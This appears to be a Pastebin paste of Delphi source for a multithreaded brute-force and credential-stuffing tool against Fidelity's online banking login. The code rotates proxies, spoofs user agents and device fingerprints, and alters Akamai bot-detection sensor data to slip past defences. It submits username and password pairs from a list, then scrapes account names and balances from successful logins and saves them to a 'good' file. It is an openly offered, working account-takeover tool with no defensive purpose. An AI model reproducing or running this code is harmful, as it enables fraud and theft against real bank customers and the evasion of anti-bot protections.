Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- unit BruteAppThread;
- interface
- uses
- System.Classes, SyncObjs, VCL.Dialogs, synachar, ssl_openssl, Math,
- httpsend, synautil, synsock, blcksock, SysUtils, RegExpr;
- type
- TManualThread = class(TThread)
- strict private
- HTTP: THTTPSend;
- Pagedata: TStringList;
- JSON: TStringStream;
- PKId, URLText, Bio, UserName, Password, DeviceSign, send_timezone,
- send_height, send_width, send_availHeight, send_AppVersion, Send_productSub,
- DevicePrint, UserCheck: String;
- Reg: TRegExpr;
- procedure DelimitUser(Str: string; out User, Pass: string);
- protected
- fAcc, fProxy, ThreadResult: Integer;
- fPrAddr, fPrPort: string;
- function WorkingThread: Boolean;
- procedure Execute; override;
- procedure MakeSomeRandomError;
- procedure Sync;
- end;
- implementation
- uses BruteAppUnit;
- procedure TManualThread.DelimitUser(Str: string; out User, Pass: string);
- begin
- if Pos(';', Str) <> 0 then
- begin
- User := Copy(Str, 1, Pos(';', Str) - 1);
- Pass := Copy(Str, Pos(';', Str) + 1, Length(Str));
- end
- else
- begin
- User := Copy(Str, 1, Pos(':', Str) - 1);
- Pass := Copy(Str, Pos(':', Str) + 1, Length(Str));
- end;
- if Pos('@', User) <> 0 then User := Copy(User, 1, Pos('@', User) - 1);
- end;
- procedure TManualThread.Execute;
- var
- fBool: Boolean;
- begin
- while Working do
- begin
- CS.Enter;
- Inc(Acc);
- if AccountList.Count -1 <= Acc then Working := False else fAcc := Acc;
- CS.Leave;
- if Working then
- begin
- HTTP := THTTPSend.Create;
- Pagedata := TStringList.Create;
- JSON := TStringStream.Create;
- DelimitUser(AccountList[fAcc], UserName, Password);
- Reg := TRegExpr.Create;
- UserCheck := '';
- if (Length(UserName) >= 5) and (Password <> '') then
- begin
- repeat
- fBool := WorkingThread;
- until fBool;
- end
- else ThreadResult := 2;
- Synchronize(Sync);
- Reg.Free;
- HTTP.Free;
- Pagedata.Free;
- JSON.Free;
- end;
- end;
- end;
- procedure TManualThread.MakeSomeRandomError;
- begin
- CS.Enter;
- Inc(Help.ConnectError);
- CS.Leave;
- end;
- procedure TManualThread.Sync;
- begin
- case ThreadResult of
- 1: begin
- Inc(Help.Good);
- Append(GoodFile);
- Writeln(GoodFile, UserName + ';' + Password);
- Writeln(GoodFile, UserCheck);
- Writeln(GoodFile, '******************************************');
- CloseFile(GoodFile);
- Item := BruteAppForm.ResultList.Items.Add;
- Item.Caption := UserName;
- Item.SubItems.Add(Password);
- end;
- 2: begin
- Inc(Help.Bad);
- Append(BadFile);
- Writeln(BadFile, UserName + ';' + Password);
- CloseFile(BadFile);
- end;
- 3: begin
- Inc(Help.Good2FA);
- Append(SecurityFile);
- Writeln(SecurityFile, UserName + ';' + Password);
- CloseFile(SecurityFile);
- end;
- end;
- end;
- function URLDecode(Str: String): String;
- var
- DynStr: String;
- begin
- DynStr := Str;
- DynStr := StringReplace(DynStr, '!', '%21', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '#', '%23', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '$', '%24', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '&', '%26', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, #39, '%27', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '*', '%2A', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '+', '%2B', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, ',', '%2C', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '/', '%2F', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, ':', '%3A', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, ';', '%3B', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '=', '%3D', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '?', '%3F', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '@', '%40', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '[', '%5B', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, ']', '%5D', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '{', '%7B', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '"', '%22', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '}', '%7D', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, ' ', '%20', [rfReplaceAll]);
- DynStr := StringReplace(DynStr, '\', '%5C', [rfReplaceAll]);
- Result := DynStr;
- end;
- function TManualThread.WorkingThread: Boolean;
- var
- RandomArrInd, I: Integer;
- Sensor, Cook: String;
- begin
- JSON.Clear;
- Pagedata.Clear;
- HTTP.Document.Clear;
- HTTP.Cookies.Clear;
- HTTP.Headers.Clear;
- CS.Enter;
- Inc(Proxy); if ProxyList.Count -1 <= Proxy then Proxy := 0; fProxy := Proxy;
- CS.Leave;
- fPrAddr := Copy(ProxyList[fProxy], 1, Pos(':', ProxyList[fProxy]) - 1);
- fPrPort := Copy(ProxyList[fProxy], Pos(':', ProxyList[fProxy]) + 1, Length(ProxyList[fProxy]));
- if fProxyType = 0 then
- begin
- HTTP.ProxyHost := fPrAddr;
- HTTP.ProxyPort := fPrPort;
- end
- else if fProxyType = 1 then
- begin
- HTTP.Sock.SocksIP := fPrAddr;
- HTTP.Sock.SocksPort := fPrPort;
- HTTP.Sock.SocksResolver := False;
- HTTP.Sock.SocksType := ST_Socks4;
- end
- else
- begin
- HTTP.Sock.SocksIP := fPrAddr;
- HTTP.Sock.SocksPort := fPrPort;
- HTTP.Sock.SocksResolver := False;
- HTTP.Sock.SocksType := ST_Socks5;
- end;
- HTTP.AddPortNumberToHost := False;
- HTTP.Protocol := '1.1';
- RandomArrInd := Random(15);
- HTTP.UserAgent := UserAgents[Random(35)][0];
- HTTP.Headers.Add('Purpose:prefetch');
- HTTP.Headers.Add('Upgrade-Insecure-Requests:1');
- HTTP.Headers.Add('Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8');
- if (HTTP.HTTPMethod('GET', 'https://www.fidelity.com/')) and (HTTP.ResultCode = 200) then
- begin
- HTTP.Headers.Clear;
- HTTP.Document.Clear;
- (* HTTP.Headers.Add('Accept:*/*');
- HTTP.Headers.Add('Referer:https://www.fidelity.com/');
- HTTP.HTTPMethod('GET', 'https://www.fidelity.com/_bm/bd-1-30');
- HTTP.Headers.Clear;
- HTTP.Document.Clear;
- HTTP.Headers.Clear;
- HTTP.Document.Clear;
- HTTP.Headers.Add('Accept:*/*');
- HTTP.Headers.Add('Referer:https://www.fidelity.com/');
- HTTP.HTTPMethod('GET', 'https://dpesb.fidelity.com/ftgw/dpdirect/measurement/visitoridentification/v1'); *)
- HTTP.ProxyHost := '';
- HTTP.ProxyPort := '';
- HTTP.Sock.SocksIP := '';
- HTTP.Sock.SocksPort := '';
- HTTP.Headers.Clear;
- HTTP.Document.Clear;
- try
- for RandomArrInd := 0 to HTTP.Cookies.Count - 1 do
- begin
- if Cook <> '' then Cook := Cook + '&';
- Cook := Cook + 'cookie' + IntToStr(RandomArrInd) + '=' + URLDecode(HTTP.Cookies[RandomArrInd]);
- end;
- JSON.WriteString(Cook);
- except
- end;
- HTTP.Document.LoadFromStream(JSOn);
- HTTP.MimeType := 'application/x-www-form-urlencoded';
- if HTTP.HTTPMethod('POST', 'http://localhost:80/fidelity') then
- begin
- Pagedata.LoadFromStream(HTTP.Document);
- Sensor := Help.Pars('"sensor_data":"', Pagedata.Text, '"}');
- Sensor := StringReplace(Sensor, '2883', '12147', [rfReplaceAll]);
- Sensor := StringReplace(Sensor, 'cwen:0', 'cwen:1', [rfReplaceAll]);
- Sensor := StringReplace(Sensor, 'wrc:0', 'wrc:1', [rfReplaceAll]);
- Sensor := StringReplace(Sensor, 'vib:0', 'vib:1', [rfReplaceAll]);
- Sensor := StringReplace(Sensor, 'bat:0', 'bat:1', [rfReplaceAll]);
- Sensor := StringReplace(Sensor, 'do_dis', 'do_en', [rfReplaceAll]);
- Sensor := StringReplace(Sensor, 'dm_dis', 'dm_en', [rfReplaceAll]);
- Sensor := StringReplace(Sensor, 'Gecko,-1', 'Gecko,3', [rfReplaceAll]);
- end;
- if fProxyType = 0 then
- begin
- HTTP.ProxyHost := fPrAddr;
- HTTP.ProxyPort := fPrPort;
- end
- else if fProxyType = 1 then
- begin
- HTTP.Sock.SocksIP := fPrAddr;
- HTTP.Sock.SocksPort := fPrPort;
- HTTP.Sock.SocksResolver := False;
- HTTP.Sock.SocksType := ST_Socks4;
- end
- else
- begin
- HTTP.Sock.SocksIP := fPrAddr;
- HTTP.Sock.SocksPort := fPrPort;
- HTTP.Sock.SocksResolver := False;
- HTTP.Sock.SocksType := ST_Socks5;
- end;
- HTTP.Headers.Clear;
- HTTP.Document.Clear;
- JSON.Clear;
- HTTP.Cookies.Add('ia=1');
- JSON.WriteString('{"sensor_data":"' + Sensor + '"}');
- HTTP.Headers.Clear;
- HTTP.Document.Clear;
- if BruteAppForm.sCheckBox1.Checked then
- begin
- HTTP.Cookies.Add(BruteAppForm.sEdit1.Text);
- JSON.Clear;
- JSON.WriteString(BruteAppForm.sEdit1.Text);
- end;
- HTTP.Document.LoadFromStream(JSON);
- HTTP.MimeType := 'text/plain;charset=UTF-8';
- HTTP.Headers.Add('Accept:*/*');
- HTTP.Headers.Add('Referer:https://www.fidelity.com/');
- HTTP.Headers.Add('Accept-Language:en-US,en;q=0.9');
- HTTP.KeepAliveTimeout := 0;
- if HTTP.HTTPMethod('POST', 'https://www.fidelity.com/_bm/_data') then
- begin
- if Pos('_abck=', HTTP.Headers.Text) <> 0 then
- begin
- Result := True;
- ThreadResult := 1;
- HTTP.Headers.Clear;
- HTTP.Document.Clear;
- if HTTP.HTTPMethod('GET', 'https://login.fidelity.com/ftgw/Fas/Fidelity/RtlCust/Login/Init/dj.chf.ra?AuthRedUrl=https%3A%2F%2Foltx.fidelity.com%2Fftgw%2Ffbc%2Fofsummary%2FdefaultPage&AuthOrigUrl=&errorpage=%2Flogin%2FerrorPages%2FaccountErrorPage') then
- begin
- HTTP.Headers.Clear;
- HTTp.Document.Clear;
- DevicePrint := 'version=3.5.2_2&pm_fpua=' + LowerCase(HTTP.UserAgent) + '|' + send_AppVersion + ' |Win32&pm_fpsc=24'+
- '|' + Windows[RandomArrInd][0] + '|' + Windows[RandomArrInd][1] + '|' + Windows[RandomArrInd][2] + '&pm_fpsw=&pm_fptz=-8&pm_fpln=lang=en-US|syslang=|userlang=&pm_fpjv=0&pm_fpco=1'+
- '&pm_fpasw=internal-pdf-viewer|mhjfbmdgcfjbbpaeojofohoefgiehjai|internal-nacl-plugin&pm_fpan=Netscape&pm_fpacn=Mozilla&pm_fpol=true&pm_fposp=&pm_fpup=&pm_fpsaw=' + Windows[RandomArrInd][0] + '&pm_fpspd=24&pm_fpsbd=&pm_fpsdx='+
- '&pm_fpsdy=&pm_fpslx=&pm_fpsly=&pm_fpsfse=&pm_fpsui=&pm_os=Windows&pm_brmjv=' + Help.Pars('Chrome/', HTTP.UserAgent, '.') + '&pm_br=Chrome&pm_inpt=&pm_expt=';
- JSOn.Clear;
- JSON.WriteString('DEVICE_PRINT=' + Help.URLDecode(DevicePrint) + '&SSN=' + Username + '&SavedIdInd=N&PIN=' + Password);
- HTTP.Document.LoadFromStream(JSON);
- HTTP.Headers.Add('Accept:application/json, text/javascript, */*; q=0.01');
- HTTP.MimeType := 'application/x-www-form-urlencoded; charset=UTF-8';
- HTTP.Headers.Add('Referer:https://www.fidelity.com/');
- if HTTP.HTTPMethod('POST', 'https://login.fidelity.com/ftgw/Fas/Fidelity/RtlCust/Login/Response/dj.chf.ra?AuthRedUrl=https%3A%2F%2Foltx.fidelity.com%2Fftgw%2Ffbc%2Fofsummary%2FdefaultPage&AuthOrigUrl=&errorpage=%2Flogin%2FerrorPages%2FaccountErrorPage') then
- begin
- Pagedata.LoadFromStream(HTTP.Document);
- if Pos('"result": "success"', Pagedata.Text) <> 0 then
- begin
- Result := True;
- ThreadResult := 1;
- HTTP.Headers.Clear;
- HTTP.Document.Clear;
- Pagedata.Clear;
- if HTTP.HTTPMethod('GET', 'https://oltx.fidelity.com/ftgw/fbc/oftop/portfolio#summary') then
- begin
- Pagedata.LoadFromStream(HTTP.Document);
- Reg.Expression := 'js-account"(.*?)data-today-change-pct-value="">';
- if Reg.Exec(Pagedata.Text) then
- repeat
- if UserCheck <> '' then UserCheck := UserCheck + #13#10;
- UserCheck := UserCheck + Trim(Help.Pars('account-name" data-pii="true">', Reg.Match[1], '<')) + ' ' + Trim(Help.Pars('js-acct-balance">', Reg.Match[1], '<'));
- until not Reg.ExecNext;
- end;
- end
- else if Pos('<title>We are Sorry. There was a Technical Issue.</title>', Pagedata.Text) <> 0 then
- begin
- MakeSomeRandomError;
- Result := False;
- ThreadResult := 0;
- end else if Pos('Error:</strong> The username', Pagedata.Text) <> 0 then
- begin
- Result := True;
- ThreadResult := 2;
- end;
- end
- else MakeSomeRandomError;
- end
- else MakeSomeRandomError;
- end else begin
- CS.Enter;
- Inc(help.InternalErrors);
- CS.Leave;
- end;
- end
- else MakeSomeRandomError;
- end
- else MakeSomeRandomError;
- end;
- end.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement